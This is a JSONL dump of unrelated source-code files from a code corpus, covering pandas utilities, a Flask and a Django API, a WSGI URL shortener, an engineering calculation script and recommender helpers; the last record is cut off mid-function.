+{"seq_id":"568830051","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/PyStatsBatteries/Management.py\n# Compiled at: 2020-02-04 10:56:42\n# Size of source mod 2**32: 3384 bytes\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n__all__ = [\n 'Management']\n\nclass Management:\n    __doc__ = '\\n    This class provides several functions for managing your dataframes. More precisely in the case where data are not well\\n    reported. You can use them through different python dataframes.\\n    '\n\n    def Import(self, path, head, sep):\n        \"\"\"\n\n        :param path: a string with the path of the dataset\n        :param head: a string if the data are already in a classic type with header : \"Classic\". 
Otherwise : \"Other\"\n        :param sep: a string with the type of separator for data\n        :return: a pandas dataframe\n        \"\"\"\n        if '.csv' in path:\n            X = pd.read_csv(path, sep=sep)\n            if head != 'Classic':\n                X.columns = X.iloc[0, :]\n                X = X.drop(index=0)\n                return X\n            return X\n        else:\n            if '.xlsx' in path:\n                X = pd.read_excel(path)\n                if head != 'Classic':\n                    X.columns = X.iloc[0, :]\n                    X = X.drop(index=0)\n                    return X\n                return X\n            else:\n                if '.txt' in path:\n                    X = pd.read_csv(path, sep=sep)\n                    if head != 'Classic':\n                        X.columns = X.iloc[0, :]\n                        X = X.drop(index=0)\n                        return X\n                    return X\n\n    def Split(self, Columns, X, ratio):\n        \"\"\"\n\n        :param Columns: a list of string containing all features to predict\n        :param X: a dataframe\n        :param ratio: a float between 0 and 1 for splitting train/test\n        :return: 4 dataframes with training and test sets\n        \"\"\"\n        Train, Test = train_test_split(X, train_size=ratio)\n        XTrain = Train.drop(columns=Columns)\n        XTest = Test.drop(columns=Columns)\n        YTrain = Train[Columns]\n        YTest = Test[Columns]\n        return (\n         XTrain, YTrain, XTest, YTest)\n\n    def Oversamplling(self, X, feature):\n        \"\"\"\n\n        :param X: an unbalanced dataframe\n        :param feature: a string with the name of the feature where the oversampling has to be done\n        :return: a balanced dataframe for the feature corresponding\n        \"\"\"\n        liste = list(X[feature].unique())\n        over = X[feature].value_counts(normalize=False).index[0]\n        label_0 = X[(X[feature] == over)]\n        liste.remove(int(over))\n        taille = label_0.shape[0]\n        new_0 = label_0.sample(n=taille, replace=False)\n        for i in liste:\n            label_1_1 = X[(X[feature] == i)]\n            new_1_1 = label_1_1\n            new_1_2 = label_1_1.sample(n=(taille - label_1_1.shape[0]), replace=True)\n            new_1 = pd.concat([new_1_1, new_1_2], ignore_index=True)\n            new_0 = pd.concat([new_0, new_1], ignore_index=True)\n\n        return new_0.sample(n=(new_0.shape[0]), replace=False)\n\n    def OrderBy(self, X, feature1, feature2):\n        \"\"\"\n\n        :param X: a dataframe\n        :param feature1: a string with the name of the feature that will be plotted\n        :param feature2: a string with the name of the feature with which you order\n        :return: a dataframe ordered by feature2\n        \"\"\"\n        return X.sort_values(by=feature2)","sub_path":"pycfiles/PyStatsBatteries-0.0.3-py3.7/Management.cpython-37.py","file_name":"Management.cpython-37.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"190193647","text":"import unittest\nimport sys,os\nsys.path.append(os.path.abspath('../src/parsers'))\nfrom ParserFactory import ParserFactory\nfrom Parser import ParserType\nfrom CPPParser import CPPParser\nfrom PythonParser import PythonParser\n\nclass TestCase003(unittest.TestCase):\n    def setUp(self):\n        self.factory=ParserFactory()\n        self.factory.addParser(CPPParser())\n        self.factory.addParser(PythonParser())\n\n    def test_path(self):\n        self.factory.parse(ParserType.Python,'../data/python','../bin/pythonexamples')\n        self.factory.parse(ParserType.Cpp,'../data/c++','../bin/cppexamples')\n        self.assertEqual(self.factory.getParser(ParserType.Python).getInputPath(),'../data/python')\n        self.assertEqual(self.factory.getParser(ParserType.Python).getOutputPath(),'../bin/pythonexamples')\n        self.assertEqual(self.factory.getParser(ParserType.Cpp).getInputPath(),'../data/c++')\n        self.assertEqual(self.factory.getParser(ParserType.Cpp).getOutputPath(),'../bin/cppexamples')\n\nif __name__ == '__main__':\n    suite = unittest.TestLoader().loadTestsFromTestCase(TestCase003)\n    
unittest.TextTestRunner(verbosity=1).run(suite)\n\n","sub_path":"tests/test.case.003.py","file_name":"test.case.003.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"194322384","text":"from html import escape\nfrom urllib.parse import parse_qs\nfrom wsgiref.simple_server import make_server\nfrom mongoengine import *\nfrom shoturl.Link import Link\nfrom hashlib import md5\n\n\ndef handle_post_request(environ):\n    \"\"\"\n    Extracts the link value from the POST request\n    :param environ:\n    :return: response body and headers\n    \"\"\"\n    try:\n        request_body_size = int(environ.get('CONTENT_LENGTH', 0))\n    except ValueError:\n        request_body_size = 0\n\n    request_body = environ['wsgi.input'].read(request_body_size).decode('utf-8')\n    d = parse_qs(request_body, \"utf-8\")\n    user_link = d.get('link', [''])[0]  # parse the link passed in the POST body\n    hash = save_user_link_to_db(user_link)  # saves the link to the database\n    response_body = page % {'redirect': hash, 'link': \"\"}  # render the user's link on the page\n    response_headers = [\n        ('Content-Type', 'text/html; charset=utf-8'),\n        ('Content-Length', str(len(response_body)))\n    ]\n    return response_body, response_headers\n\n\ndef save_user_link_to_db(user_link):\n    \"\"\"\n    Generates a hash and saves the entity to the database\n    :param user_link: link to the site\n    :return: hash code of the string (link)\n    \"\"\"\n    hash = str(md5(user_link.encode(\"utf-8\")).hexdigest()[:6])\n    link = Link(original_link=user_link, short_link=hash)\n    if not Link.objects(original_link__contains=user_link):\n        link.save()\n    return hash\n\n\ndef redirect_url(user_link):\n    \"\"\"\n    :param user_link: hash link the user wants to follow\n    :return: response status and headers\n    \"\"\"\n    try:  # tries to find the link in the database; returns 404 if it does not exist\n        short_link = Link.objects.get(short_link=user_link)\n        url = short_link.original_link\n        status = '301 Moved Permanently'\n        response_headers = [('Content-type', 'text/html'), ('Location', '{}'.format(url))]\n    except:  # value not found, return 404\n        status = '404 NOT FOUND'\n        response_headers = [('Content-type', 'text/html'), ]\n    return status, response_headers\n\n\ndef parse_query_string(environ):\n    \"\"\"\n    Parses 'QUERY_STRING'\n    :param environ:\n    :return:\n    \"\"\"\n    qs = parse_qs(environ['QUERY_STRING'])\n    hash = str(escape(qs.get('hash', [''])[0]))\n    return hash\n\n\ndef parse_path(environ):\n    \"\"\"\n    Parses PATH_INFO\n    :param environ:\n    :return:\n    \"\"\"\n    qs = (environ['PATH_INFO'])\n    path = qs.split('/')\n    return path[1]\n\n\ndef parse_hash(environ):\n    \"\"\"\n    Tries to parse QUERY_STRING, falling back to PATH_INFO\n    :param environ:\n    :return:\n    \"\"\"\n    link_hash = parse_query_string(environ)\n    if link_hash == '':\n        link_hash = parse_path(environ)\n    return link_hash\n\n\ndef application(environ, start_response):\n    status = '200 OK'\n    response_headers = []\n    response_body = ''\n    if environ['REQUEST_METHOD'] == 'POST':  # handle the POST request\n        response_body, response_headers = handle_post_request(environ)\n    elif environ['REQUEST_METHOD'] == 'GET':  # handle the GET request\n        link_hash = parse_hash(environ)\n        if link_hash != '':\n            print(link_hash)\n            status, response_headers = redirect_url(link_hash)\n        else:\n            response_body = page % {'redirect': link_hash, 'link': \"\"}\n    start_response(status, response_headers)\n    return [response_body.encode(\"utf-8\")]\n\n\nif __name__ == '__main__':\n    filename = \"submitform.html\"\n    HtmlFile = open(filename, 'r', 
encoding='utf-8')\n    page = HtmlFile.read()\n    server = make_server('localhost', 8080, application)\n    connect(\"shortlinks\")  # name of the local Mongo DB\n    server.serve_forever()\n","sub_path":"shoturl/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"583900758","text":"import sys\nfrom Solution import Solution\n\n\ndef read_file(filename):\n    graph = {}\n    node = 0\n    with open(filename, 'r') as input_file:\n        for line in input_file:\n            adj_nodes = [int(neighbor) for neighbor in line.split()]\n            graph[node] = adj_nodes\n            node += 1\n    return graph\n\nif __name__ == '__main__':\n    if len(sys.argv) < 2:\n        print(\"Please provide the testcase filepath as a command line argument\")\n    else:\n        adj_list = read_file(sys.argv[1])\n        sol = Solution(adj_list).find_cycle()\n        #print(\"Your Solution:\")\n        #print(\"============================================================================\")\n        print(sol)\n        #print(\"============================================================================\")\n","sub_path":"Driver.py","file_name":"Driver.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"509685255","text":"\"\"\"\"\nCreated on wednesday june 30 12:33:13 2021\nImplementation of the strength-of-materials section, from the tube wall-thickness condition to the areas affected by bolts\n\"\"\"\n\nfrom numpy import arcsin,cos,tan,pi,e\n\"\"\"Variables needed from previous parts\ntemp_E13= 0.0730\ntemp_E13= float(temp_E13)\ntemp_E14= 0.0052\ntemp_E15= 0.0314\"\"\"\n# Strength of materials / tube wall-thickness condition \nDiametro_Medio_de_tubo = 0 \nDiametro_Medio_de_tubo = float(temp_E13-temp_E14) # Dm = Dext-Esp\nprint(\"diametro medio del tubo\", Diametro_Medio_de_tubo)\nCondicion_Espesor= 0\nCondicion_Espesor = float(Diametro_Medio_de_tubo/temp_E14)# Cesp = Dm/Esp\nprint(\"Condición de espesor\",Condicion_Espesor)\n#--------------------------------------------------------------------------------------------------------------------------\n#Strength of materials / Pressure \nPresion_maxima = 1.01*10**5 # Pascals (obtained from simulation)\nPmax = 14.70 #PSI\n#--------------------------------------------------------------------------------------------------------------------------\n#Strength of materials / Stress due to pressure\n#Tangential stress\nif Condicion_Espesor > 20:\n    Esfuerzo_Tangencial= Presion_maxima*temp_E15/temp_E14\nelse:\n    Esfuerzo_Tangencial = Presion_maxima*((temp_E13/2)**2+temp_E15**2)/((temp_E13/2)**2-temp_E15**2)\nprint(\"Esfuerzo tangencial\",Esfuerzo_Tangencial,\"Pa\")\n#Longitudinal stress\nif Condicion_Espesor > 20:\n    Esfuerzon_Longitudinal = Presion_maxima*temp_E15/2*temp_E14\nelse :\n    Esfuerzon_Longitudinal = Presion_maxima*temp_E15**2/((temp_E13/2)**2-temp_E15**2)\nprint(\"Esfuerzo longitudinal\",Esfuerzon_Longitudinal,\"Pa\")\n#Radial stress\nif Condicion_Espesor > 20:\n    Esfuerzo_Radial= 0\nelse:\n    Esfuerzo_Radial = -Presion_maxima\nprint(\"Esfuerzo Radial\",Esfuerzo_Radial,\"Pa\")\n#Maximum stress\nif Esfuerzo_Tangencial > Esfuerzo_Radial:\n    Esfuerzo_Maximo = Esfuerzo_Tangencial\nelse:\n    Esfuerzo_Maximo = Esfuerzo_Radial\nprint (\"Esfuerzo Maximo\", Esfuerzo_Maximo,\"Pa\")\n#Safety margin\ntemp_E20 = 2.75*10**8 \nn=temp_E20/Esfuerzo_Maximo\nprint(\"Margen 
Seguridad\",n,)\n#----------------------------------------------------------------------------------------\n#Strength of materials, determination of the areas affected by bolts\nNumero_tornillos= 6\nDiametro_Tornillos=0.009\nDistancia_centro_tornillo_pared=0.01\n#Tube cross-sectional area\nArea_Transversal_tubo = pi*((temp_E13/2)**2-temp_E15**2)\nprint(\"Area Transversal\",Area_Transversal_tubo,\"m^2\")\n#Area of the circular sector\nAngulo_sector_circular= arcsin((Diametro_Tornillos/2)/temp_E15)\nprint(\"Angulosector circular\",Angulo_sector_circular*(180/pi),\" grados\")\n#Cross-sectional area of one bolt\nArea_Transversal_1_tornillo= (Angulo_sector_circular/2)*((temp_E13/2)**2-temp_E15**2-temp_E14**2)\nprint(\"Area transversal de un tornillo\",Area_Transversal_1_tornillo,\"m^2\")\n#Cross-sectional area occupied by the bolts\nArea_trnasversal_Tornillos = Area_Transversal_1_tornillo*Numero_tornillos\nprint(\"Area Transversal de los tornilos\", Area_trnasversal_Tornillos,\"m^2\")\n#Material area\nArea_Material = Area_Transversal_tubo-Area_trnasversal_Tornillos\nprint(\"Area de Material\",Area_Material,\"m^2\")\n#Thickness of the shear segment\nEspesor_segemento_cortante = Distancia_centro_tornillo_pared-(Diametro_Tornillos/2)\nprint(\"Espesor de segmento cortante\",Espesor_segemento_cortante,\"m\")","sub_path":".python/resistencia_materiales.py","file_name":"resistencia_materiales.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"434390323","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom .views import (ProjetoViewSet, DupViewSet, ProfaixaViewSet, TopografiaViewSet,\n                    FaixaDeDominioViewSet, EmpresaViewSet, CartorioViewSet, PropriedadeLindeiraViewSet,\n                    PropriedadeRodoviaViewSet, MatriculaViewSet, api_root, RodoviaViewSet, DupCompletoViewSet, \n                    ProjetoBRViewSet, download,PropriedadeLindeiraBRViewSet, PropriedadeLindeiraCompletoViewSet, \n                    ProjetoGeoViewSet, ProjetoCompletoViewSet, EstatisticaView, ProfaixaBRViewSet, ProfaixaLoteViewSet, \n                    DupBRViewSet, PropriedadeLindeiraLoteViewSet, ProjetoEmpreendimentoViewSet, ProjetoFilterViewSet,\n                    ProfaixaFilterViewSet, PropriedadeLindeiraFilterViewSet)\n\n''' Cartorio '''\n\ncartorio_list = CartorioViewSet.as_view({'get': 'list'})\n\ncartorio_detail = CartorioViewSet.as_view({'get': 'retrieve'})\n\n''' DUP '''\n\ndups_list = DupViewSet.as_view({'get': 'list'})\n\ndup_detail = DupViewSet.as_view({'get': 'retrieve'})\n\n# Dups serialized for normal display\n\ndups_c_list = DupCompletoViewSet.as_view({'get': 'list'})\n\ndups_c_detail = DupCompletoViewSet.as_view({'get': 'retrieve'})\n\ndup_list_br = DupBRViewSet.as_view({'get': 'list'})\n\n\n''' Empresa '''\n\nempresa_list = EmpresaViewSet.as_view({'get': 'list'})\n\nempresa_detail = EmpresaViewSet.as_view({'get': 'retrieve'})\n\n''' Faixa de dominio '''\n\nfaixa_list = FaixaDeDominioViewSet.as_view({'get': 'list'})\n\nfaixa_detail = FaixaDeDominioViewSet.as_view({'get': 'retrieve'})\n\n''' Matricula '''\n\nmatricula_list = MatriculaViewSet.as_view({'get': 'list'})\n\nmatricula_detail = MatriculaViewSet.as_view({'get': 'retrieve'})\n\n''' Profaixa '''\n\nprofaixa_list = ProfaixaViewSet.as_view({'get': 'list'})\n\nprofaixa_detail = ProfaixaViewSet.as_view({'get': 'retrieve'})\n\nprofaixa_list_br = ProfaixaBRViewSet.as_view({'get': 'list'})\n\nprofaixa_list_lote = ProfaixaLoteViewSet.as_view({'get': 'list'})\n\nprofaixa_filter = ProfaixaFilterViewSet.as_view({'get': 
'list'})\n\n\n''' Projeto '''\n\nprojeto_list = ProjetoViewSet.as_view({'get': 'list'})\n\nprojeto_c_list = ProjetoGeoViewSet.as_view({'get': 'list'})\n\nprojeto_c_detail = ProjetoCompletoViewSet.as_view({'get': 'retrieve'})\n\nprojeto_list_br = ProjetoBRViewSet.as_view({'get': 'list'})\n\nprojeto_detail = ProjetoViewSet.as_view({'get': 'retrieve'})\n\nprojeto_empreendimento_list = ProjetoEmpreendimentoViewSet.as_view({'get': 'list'})\n\nprojeto_filter = ProjetoFilterViewSet.as_view({'get': 'list'})\n\n''' Propriedade Lindeira '''\n\npropriedade_lindeira_list = PropriedadeLindeiraViewSet.as_view({'get': 'list'})\n\npropriedade_lindeira_list_br = PropriedadeLindeiraBRViewSet.as_view({'get': 'list'})\n\npropriedade_lindeira_detail = PropriedadeLindeiraViewSet.as_view({'get': 'retrieve'})\n\npropriedade_lindeira_c_detail = PropriedadeLindeiraCompletoViewSet.as_view({'get':'retrieve'})\n\npropriedade_lindeira_list_lote = PropriedadeLindeiraLoteViewSet.as_view({'get': 'list'})\n\npropriedade_lindeira_filter = PropriedadeLindeiraFilterViewSet.as_view({'get': 'list'})\n\n\n''' Propriedade Rodovia '''\n\npropriedade_rodovia_list = PropriedadeRodoviaViewSet.as_view({'get': 'list'})\n\npropriedade_rodovia_detail = PropriedadeRodoviaViewSet.as_view({'get': 'retrieve'})\n\n''' Topografia '''\n\ntopografia_list = TopografiaViewSet.as_view({'get': 'list'})\n\ntopografia_detail = TopografiaViewSet.as_view({'get': 'retrieve'})\n\n''' Rodovias '''\n\nrodovia_list = RodoviaViewSet.as_view({'get': 'list'})\n\nrodovia_detail = RodoviaViewSet.as_view({'get': 'retrieve'})\n\n''' URL Settings for rest API '''\n\nurlpatterns = [\n url(r'^$', api_root, name='rest_api'),\n url(r'^cartorio/$', cartorio_list, name='cartorio-list'),\n url(r'^cartorio/(?P[0-9]+)/$', cartorio_detail, name='cartorio-detail'),\n url(r'^dups/$', dups_list, name='dups-list'),\n url(r'^dups/(?P[0-9]+)/$', dup_detail, name='dup-detail'),\n # DUPS\n url(r'^dups-list/$', dups_c_list, name='dups-c-list'),\n url(r'^dups-list-brs/$', dup_list_br, name='dups-list-brs'),\n url(r'^dups-detail/(?P[0-9]+)/$', dups_c_detail, name='dups-c-detail'),\n # END DUPS\n url(r'^empresa/$', empresa_list, name='empresa-list'),\n url(r'^empresa/(?P[0-9]+)/$', empresa_detail, name='empresa-detail'),\n url(r'^estatistica/$', EstatisticaView, name='estatistica'),\n url(r'^faixa-dominio/$', faixa_list, name='faixa-dominio-list'),\n url(r'^faixa-dominio/(?P[0-9]+)/$', faixa_detail, name='faixa-dominio-detail'),\n url(r'^matricula/$', matricula_list, name='matricula-list'),\n url(r'^matricula/(?P[0-9]+)/$', matricula_detail, name='matricula-detail'),\n url(r'^profaixa/$', profaixa_list, name='profaixa-list'),\n url(r'^profaixa/(?P[0-9]+)/$', profaixa_detail, name='profaixa-detail'),\n url(r'^profaixa-br/$', profaixa_list_br, name='profaixa-list-br'), \n url(r'^profaixa-filter/$', profaixa_filter, name='profaixa-filter'),\n url(r'^profaixa-lote/$', profaixa_list_lote, name='profaixa-list-lote'),\n url(r'^projetos/$', projeto_list, name='projetos-list'),\n url(r'^projetos-list/$', projeto_c_list, name='projetos-c-list'),\n url(r'^projetos-filter/$', projeto_filter, name='projetos-filter'),\n url(r'^projetos-c-detail/(?P[0-9]+)/$', projeto_c_detail, name='projetos-c-detail'),\n url(r'^projetos-br/$', projeto_list_br, name='projetos-list-br'),\n url(r'^projetos-empreendimentos-list/$', projeto_empreendimento_list, name='projetos-empreendimentos-list'),\n url(r'^projetos/(?P[0-9]+)/$', projeto_detail, name='projetos-detail'),\n url(r'^propriedade-lindeira/$', 
propriedade_lindeira_list, name='propriedade-lindeira-list'),\n url(r'^propriedade-lindeira-br/$', propriedade_lindeira_list_br, name='propriedade-lindeira-list-br'),\n url(r'^propriedade-lindeira/(?P[0-9]+)/$', propriedade_lindeira_detail, name='propriedade-lindeira-detail'),\n url(r'^propriedade-lindeira-filter/$', propriedade_lindeira_filter, name='propriedade-lindeira-filter'),\n url(r'^propriedade-lindeira-c/(?P[0-9]+)/$', propriedade_lindeira_c_detail, name='propriedade-lindeira-detail'),\n url(r'^propriedade-lindeira-lote/$', propriedade_lindeira_list_lote, name='propriedade-lindeira-lote'),\n url(r'^propriedade-rodovia/$', propriedade_rodovia_list, name='propriedade-rodovia-list'),\n url(r'^propriedade-rodovia/(?P[0-9]+)/$', propriedade_rodovia_detail, name='propriedade-rodovia-detail'),\n url(r'^rodovia/$', rodovia_list, name='rodovia-list'),\n url(r'^rodovia/(?P[0-9]+)/$', rodovia_detail, name='rodovia-detail'),\n url(r'^topografia/$', topografia_list, name='topografia-list'),\n url(r'^topografia/(?P[0-9]+)/$', topografia_detail, name='topografia-detail'),\n url(r'^download/(?P.*)$', download, name='download'),\n]\n\n","sub_path":"SISDR/sisdrapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"223921684","text":"#!/usr/bin/python3\n\"\"\"routes of City \"\"\"\nfrom api.v1.views import app_views\nfrom flask import Flask, jsonify, abort, request\nfrom models import storage\nfrom models.city import City\nfrom models.state import State\n\n\n@app_views.route('/states//cities',\n strict_slashes=False, methods=['GET'])\ndef list_citys_of_a_states(state_id=None):\n \"\"\"search cities with states_id\"\"\"\n city_list = []\n state_obj = storage.get(State, state_id)\n\n if state_obj:\n for obj in state_obj.cities:\n city_list.append(obj.to_dict())\n return jsonify(city_list)\n else:\n abort(404)\n\n\n@app_views.route('/cities/', strict_slashes=False, methods=['GET'])\ndef list_a_city(city_id=None):\n \"\"\"search a city with city_id\"\"\"\n if city_id:\n city_obj = storage.get(City, city_id)\n\n if city_obj:\n return jsonify(city_obj.to_dict())\n else:\n abort(404)\n\n\n@app_views.route('/cities/', strict_slashes=False, methods=['DELETE'])\ndef del_a_city(city_id=None):\n \"\"\"delete cities with states_id\"\"\"\n if city_id:\n city_obj = storage.get(City, city_id)\n\n if city_obj:\n storage.delete(city_obj)\n storage.save()\n return (jsonify({})), 200\n else:\n abort(404)\n\n\n@app_views.route(\"/states//cities\", methods=[\"POST\"],\n strict_slashes=False)\ndef create_a_city(state_id=None):\n \"\"\"create a city\"\"\"\n if state_id is None:\n abort(404)\n\n get_state = storage.get(State, state_id)\n if get_state is None:\n abort(404)\n\n data = request.get_json(silent=True)\n if not data:\n return jsonify({'error': 'Not a JSON'}), 400\n\n if 'name' not in request.json:\n abort(400, 'Missing name')\n else:\n city_new = City(**data)\n city_new.state_id = state_id\n storage.new(city_new)\n storage.save()\n return jsonify(city_new.to_dict()), 201\n\n\n@app_views.route('/cities/', strict_slashes=False,\n methods=['PUT'])\ndef update_cities(city_id=None):\n \"\"\"Updates a City\"\"\"\n if city_id is None:\n abort(404)\n json = request.get_json(silent=True)\n if not json:\n return jsonify({'error': 'Not a JSON'}), 400\n\n cities_id = storage.get(City, city_id)\n if cities_id:\n for key, value in json.items():\n setattr(cities_id, key, value)\n storage.save()\n return 
jsonify(cities_id.to_dict()), 200\n    else:\n        abort(404)\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"174297948","text":"def bubble(num):\n    for i in range(len(num)-1,0,-1):\n        for j in range(i):\n            if num[j]>num[j+1]:\n                t=num[j]\n                num[j] = num[j+1]\n                num[j+1] = t\n    return num\n\n\n\nnum = []\nl = int(input(\"Enter number of elements : \"))\nfor i in range(0, l):\n    ele = int(input('Enter the numbers : '))\n    num.append(ele)\n\nprint(bubble(num))\n\n\n","sub_path":"BUBBLE_SORT.py","file_name":"BUBBLE_SORT.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"165476033","text":"import pandas as pd\nimport numpy as np\nimport math\n\nfrom transform import *\n\n#dataset = pd.read_csv(\"./data/train_indessa.csv\")\ndataset = pd.read_csv(\"./data/test_indessa.csv\")\n\n#dataset = dataset.fillna(method='ffill')\n\n\ndef find():\n    for c in dataset.columns:\n        print(c)\n        values = dataset[c].values.flatten().tolist()\n        for v in values:\n            s = str(v)\n            if s.find('36 months') > -1:\n                print(c, v)\n\ndef transform_term():\n    t = dataset['term']\n    t.transform(lambda x: int(x.split()[0]))\n\ndef check_float_cols():\n    for col, typ in dataset.dtypes.to_dict().items():\n        #print(col, typ)\n        blank = False\n        nan = False\n        string = False\n\n        #if typ == np.dtype('float64'):\n        #    print(col)\n\n        for i in dataset[col]:\n            if type(i) == str:\n                string = True\n            elif i == '':\n                blank = True\n            elif math.isnan(i):\n                nan = True\n        \n        if string:\n            print(col, \"strings\")\n\n        if blank:\n            print(col, \"blanks\")\n\n        if nan:\n            print(col, \"nans\")\n        \n\ndef transform(col, f):\n    l = len(dataset[col])\n    for i in range(0, l):\n        dataset[col][i] = f(dataset[col][i])\n\ndataset = transform_dataset(dataset)\ncheck_float_cols()","sub_path":"hackerearth/bank_fears_loanliness/sol/common/scrub.py","file_name":"scrub.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"93830461","text":"# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License.\n\nimport pandas as pd\nimport numpy as np\n\nfrom reco_utils.common.constants import (\n    DEFAULT_USER_COL,\n    DEFAULT_ITEM_COL,\n    DEFAULT_RATING_COL,\n    DEFAULT_LABEL_COL\n)\n\n\ndef user_item_pairs(\n    user_df,\n    item_df,\n    user_col=DEFAULT_USER_COL,\n    item_col=DEFAULT_ITEM_COL,\n    user_item_filter_df=None,\n    shuffle=True,\n):\n    \"\"\"Get all pairs of users and items data.\n\n    Args:\n        user_df (pd.DataFrame): User data containing unique user ids and maybe their features.\n        item_df (pd.DataFrame): Item data containing unique item ids and maybe their features.\n        user_col (str): User id column name.\n        item_col (str): Item id column name.\n        user_item_filter_df (pd.DataFrame): User-item pairs to be used as a filter.\n        shuffle (bool): If True, shuffles the result.\n\n    Returns:\n        pd.DataFrame: All pairs of user-item from user_df and item_df, excluding the pairs in user_item_filter_df\n    \"\"\"\n\n    # Get all user-item pairs\n    user_df[\"key\"] = 1\n    item_df[\"key\"] = 1\n    users_items = user_df.merge(item_df, on=\"key\")\n\n    user_df.drop(\"key\", axis=1, inplace=True)\n    item_df.drop(\"key\", axis=1, inplace=True)\n    users_items.drop(\"key\", axis=1, inplace=True)\n\n    # Filter\n    if user_item_filter_df is not None:\n        users_items = filter_by(users_items, user_item_filter_df, [user_col, item_col])\n\n    if shuffle:\n        users_items = users_items.sample(frac=1).reset_index(drop=True)\n\n    return users_items\n\n\ndef filter_by(df, filter_by_df, filter_by_cols):\n    \"\"\"From the input DataFrame (df), remove the records whose target column (filter_by_cols) values\n    exist in the filter-by DataFrame (filter_by_df)\n\n    Args:\n        df (pd.DataFrame): Source dataframe.\n        filter_by_df (pd.DataFrame): Filter dataframe.\n        filter_by_cols (iterable of str): Filter columns.\n\n    Returns:\n        pd.DataFrame: Dataframe filtered by filter_by_df on filter_by_cols\n    \"\"\"\n\n    return df.loc[\n        ~df.set_index(filter_by_cols).index.isin(\n            filter_by_df.set_index(filter_by_cols).index\n        )\n    ]\n\n\ndef libffm_converter(df, col_rating=DEFAULT_RATING_COL, filepath=None):\n    \"\"\"Converts an input Dataframe (df) to another Dataframe (df) in libffm format. A text file of the converted\n    Dataframe is optionally generated.\n\n    Note:\n        The input dataframe is expected to represent the feature data in the following schema\n        |field-1|field-2|...|field-n|rating|\n        |feature-1-1|feature-2-1|...|feature-n-1|1|\n        |feature-1-2|feature-2-2|...|feature-n-2|0|\n        ...\n        |feature-1-i|feature-2-j|...|feature-n-k|0|\n        Where\n        1. each \"field-*\" is the column name of the dataframe (column of label/rating is excluded), and\n        2. \"feature-*-*\" can be either a string or a numerical value, representing the categorical variable or\n        actual numerical variable of the feature value in the field, respectively.\n        3. 
If there are ordinal variables represented in int types, users should make sure these columns\n are properly converted to string type.\n\n The above data will be converted to the libffm format by following the convention as explained in\n https://www.csie.ntu.edu.tw/~r01922136/slides/ffm.pdf\n\n i.e., ::1 or ::, depending on\n the data type of the features in the original dataframe.\n\n Examples:\n >>> import pandas as pd\n >>> df_feature = pd.DataFrame({\n 'rating': [1, 0, 0, 1, 1],\n 'field1': ['xxx1', 'xxx2', 'xxx4', 'xxx4', 'xxx4'],\n 'field2': [3, 4, 5, 6, 7],\n 'field3': [1.0, 2.0, 3.0, 4.0, 5.0],\n 'field4': ['1', '2', '3', '4', '5']\n })\n\n >>> df_out = libffm_converter(df_feature, col_rating='rating')\n >>> df_out\n rating field1 field2 field3 field4\n 0 1 1:1:1 2:2:3 3:3:1.0 4:4:1\n 1 0 1:2:1 2:2:4 3:3:2.0 4:5:1\n 2 0 1:3:1 2:2:5 3:3:3.0 4:6:1\n 3 1 1:3:1 2:2:6 3:3:4.0 4:7:1\n 4 1 1:3:1 2:2:7 3:3:5.0 4:8:1\n\n Args:\n df (pd.DataFrame): input Pandas dataframe.\n col_rating (str): rating of the data.\n filepath (str): path to save the converted data.\n\n Return:\n pd.DataFrame: data in libffm format.\n \"\"\"\n df_new = df.copy()\n\n # Check column types.\n types = df_new.dtypes\n if not all([x == object or np.issubdtype(x, np.integer) or x == np.float for x in types]):\n raise TypeError(\"Input columns should be only object and/or numeric types.\")\n\n field_names = list(df_new.drop(col_rating, axis=1).columns)\n\n # Encode field-feature.\n idx = 1\n field_feature_dict = {}\n for field in field_names:\n if df_new[field].dtype == object:\n for feature in df_new[field].values:\n # Check whether (field, feature) tuple exists in the dict or not.\n # If not, put them into the key-values of the dict and count the index.\n if (field, feature) not in field_feature_dict:\n field_feature_dict[(field, feature)] = idx\n idx += 1\n\n def _convert(field, feature, field_index, field_feature_index_dict):\n if isinstance(feature, str):\n field_feature_index = field_feature_index_dict[(field, feature)]\n feature = 1\n else:\n field_feature_index = field_index\n\n return \"{}:{}:{}\".format(field_index, field_feature_index, feature)\n\n for col_index, col in enumerate(field_names):\n df_new[col] = df_new[col].apply(lambda x: _convert(col, x, col_index+1, field_feature_dict))\n\n # Move rating column to the first.\n field_names.insert(0, col_rating)\n df_new = df_new[field_names]\n\n if filepath is not None:\n np.savetxt(filepath, df_new.values, delimiter=' ', fmt='%s')\n\n return df_new\n\n\ndef negative_feedback_sampler(\n df, \n col_user=DEFAULT_USER_COL,\n col_item=DEFAULT_ITEM_COL,\n col_label=DEFAULT_LABEL_COL,\n ratio_neg_per_user=1,\n seed=42\n):\n 